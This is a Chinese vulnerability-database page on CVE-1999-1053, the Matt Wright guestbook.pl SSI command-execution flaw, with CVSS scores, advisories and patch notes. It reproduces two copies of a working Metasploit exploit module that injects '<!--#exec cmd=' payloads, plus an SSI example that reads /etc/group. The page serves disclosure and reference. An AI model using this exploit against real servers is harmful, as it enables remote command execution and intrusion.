CVE-1999-1053
CVSS7.5
发布时间 :1999-09-13 00:00:00
修订时间 :2008-09-05 16:18:36
NMCOEPS    

[原文]guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".


[CNNVD]Matt Wright GuestBook远程执行任意命令漏洞(CNNVD-199909-026)

        
        GuestBook是一个由Matt Wright编写的基于Web的CGI留言本程序,使用比较广泛。
        GuestBook实现上存在输入验证漏洞,远程攻击者可能利用此漏洞以Web进程的权限在主机上执行任意系统命令。
        问题在于某些版本的guestbook.pl脚本允许用户输入SSI指令而未对用户输入进行仔细的过滤,这将允许攻击者以httpd进程的权限在主机上执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:matt_wright:matt_wright_guestbook:2.3
cpe:/a:apache:http_server:1.3.9Apache Software Foundation Apache HTTP Server 1.3.9

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1053
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1053
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-026
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/776
(VENDOR_ADVISORY)  BID  776
http://www.securityfocus.com/archive/82/27560
(VENDOR_ADVISORY)  VULN-DEV  19990916 Re: Guestbook perl script (error fix)
http://www.securityfocus.com/archive/82/27296
(VENDOR_ADVISORY)  VULN-DEV  19990913 Guestbook perl script (long)
http://www.securityfocus.com/archive/1/33674
(VENDOR_ADVISORY)  BUGTRAQ  19991105 Guestbook.pl, sloppy SSI handling in Apache? (VD#2)

- 漏洞信息

Matt Wright GuestBook远程执行任意命令漏洞
高危 输入验证
1999-09-13 00:00:00 2007-02-08 00:00:00
远程  
        
        GuestBook是一个由Matt Wright编写的基于Web的CGI留言本程序,使用比较广泛。
        GuestBook实现上存在输入验证漏洞,远程攻击者可能利用此漏洞以Web进程的权限在主机上执行任意系统命令。
        问题在于某些版本的guestbook.pl脚本允许用户输入SSI指令而未对用户输入进行仔细的过滤,这将允许攻击者以httpd进程的权限在主机上执行任意命令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在漏洞修补之前暂时停止使用该软件。
        厂商补丁:
        Matt Wright
        -----------
        程序作者已经在最新版本的软件中修补了这个完全漏洞,请到作者主页下载:
        
        http://www.worldwidemart.com/scripts/readme/guestbook.shtml

- 漏洞信息 (16914)

Matt Wright guestbook.pl Arbitrary Command Execution (EDBID:16914)
cgi webapps
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: guestbook_ssi_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Matt Wright guestbook.pl Arbitrary Command Execution',
			'Description'    => %q{
				The Matt Wright guestbook.pl <= v2.3.1 CGI script contains
				a flaw that may allow arbitrary command execution. The vulnerability
				requires that HTML posting is enabled in the guestbook.pl script, and
				that the web server must have the Server-Side Include (SSI) script
				handler enabled for the '.html' file type. By combining the script
				weakness with non-default server configuration, it is possible to exploit
				this vulnerability successfully.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9671 $',
			'References'     =>
				[
					[ 'CVE', '1999-1053' ],
					[ 'OSVDB', '84' ],
					[ 'BID', '776' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Platform'       => [ 'unix', 'win', 'linux' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Nov 05 1999',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [true, "guestbook.pl script path", "/cgi-bin/guestbook.pl"]),
					OptString.new('URIOUT', [true, "guestbook.html output", "/guestbook/guestbook.html"]),
				], self.class)
	end

	def exploit
		realname	= rand_text_alphanumeric(20)
		email		= rand_text_alphanumeric(20)
		city		= rand_text_alphanumeric(20)
		state		= rand_text_alphanumeric(20)
		country 	= rand_text_alphanumeric(20)

		sploit = Rex::Text.uri_encode("<!--#exec cmd=\"" + payload.encoded.gsub('"','\"') + "\"", 'hex-normal')

		req1 = send_request_cgi({
			'uri'     => datastore['URI'],
			'method'  => 'POST',
			'data'    => "realname=#{realname}&username=#{email}&city=#{city}&state=#{state}&country=#{country}&comments=#{sploit}",
		}, 25)

		req2 = send_request_raw({
			'uri'     => datastore['URIOUT'],
		}, 25)

	end
end
		

- 漏洞信息 (F82359)

Matt Wright guestbook.pl Arbitrary Command Execution (PacketStormID:F82359)
2009-10-30 00:00:00
patrick  metasploit.com
exploit,web,arbitrary,cgi
CVE-1999-1053
[点击下载]

The Matt Wright guestbook.pl versions 2.3.1 and below CGI script contains a flaw that may allow arbitrary command execution. The vulnerability requires that HTML posting is enabled in the guestbook.pl script, and that the web server must have the Server-Side Include (SSI) script handler enabled for the '.html' file type. By combining the script weakness with non-default server configuration, it is possible to exploit this vulnerability successfully.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Matt Wright guestbook.pl Arbitrary Command Execution',
			'Description'    => %q{
				The Matt Wright guestbook.pl <= v2.3.1 CGI script contains
				a flaw that may allow arbitrary command execution. The vulnerability
				requires that HTML posting is enabled in the guestbook.pl script, and
				that the web server must have the Server-Side Include (SSI) script
				handler enabled for the '.html' file type. By combining the script
				weakness with non-default server configuration, it is possible to exploit
				this vulnerability successfully.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '1999-1053' ],
					[ 'OSVDB', '84' ],
					[ 'BID', '776' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},		
			'Platform'       => [ 'unix', 'win', 'linux' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Nov 05 1999',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [true, "guestbook.pl script path", "/cgi-bin/guestbook.pl"]),
					OptString.new('URIOUT', [true, "guestbook.html output", "/guestbook/guestbook.html"]),
				], self.class)
	end

	def exploit
		realname	= rand_text_alphanumeric(20)
		email		= rand_text_alphanumeric(20)
		city		= rand_text_alphanumeric(20)
		state		= rand_text_alphanumeric(20)
		country		= rand_text_alphanumeric(20)

		sploit = Rex::Text.uri_encode("<!--#exec cmd=\"" + payload.encoded.gsub('"','\"') + "\"", 'hex-normal')

		req1 = send_request_cgi({
			'uri'     => datastore['URI'],
			'method'  => 'POST',
			'data'    => "realname=#{realname}&username=#{email}&city=#{city}&state=#{state}&country=#{country}&comments=#{sploit}",
		}, 25)

		req2 = send_request_raw({
			'uri'     => datastore['URIOUT'],
		}, 25)
		
	end
end

    

- 漏洞信息

84
Matt Wright guestbook.pl Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

guestbook.pl contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is triggered when the Guestbook option is enabled that allows HTML posting and the Web server has SSI (Server-Side Include) enabled for .html files. It is possible that the flaw may allow a remote attacker to insert SSI code in guestbook messages and execute arbitrary commands with the privileges of the Web server resulting in a loss of integrity.

- 时间线

1999-11-05 Unknow
1999-11-05 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Guestbook CGI Remote Command Execution Vulnerability
Input Validation Error 776
Yes No
1999-11-05 12:00:00 2009-07-11 12:56:00
This was discussed on the Vuln-Dev mailing list hosted by Security Focus in a thread starting on September 13, 1999. It was posted to BugTraq by Blue Boar <BlueBoar@thievco.com> on Nov 5, 1999.

- 受影响的程序版本

Matt Wright GuestBook 2.3

- 漏洞讨论

When Guestbook is configured to allow HTML posts and you have enabled server-side includes for HTML, it may be possible for an attacker to embed SSI (server-side include) code in guestbook messages. The server-side includes allow for remote command execution, including displaying of any files to which the web server has read access (see the example):


&lt;!--#exec cmd="cat /etc/group"

In an attempt to stop this from happening, guestbook.pl parses for SSI commands under the assumption that they are in this format:

&lt;-- SSI command --&gt;
^^ Does not need to be there.

Apache will accept different formats, which can evade the regular expression in guestbook.pl, executing commands on the target host as they would [if they were put there by the author].

- 漏洞利用

See discussion.

- 解决方案

A temporary solution is to disable server side includes in apache.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站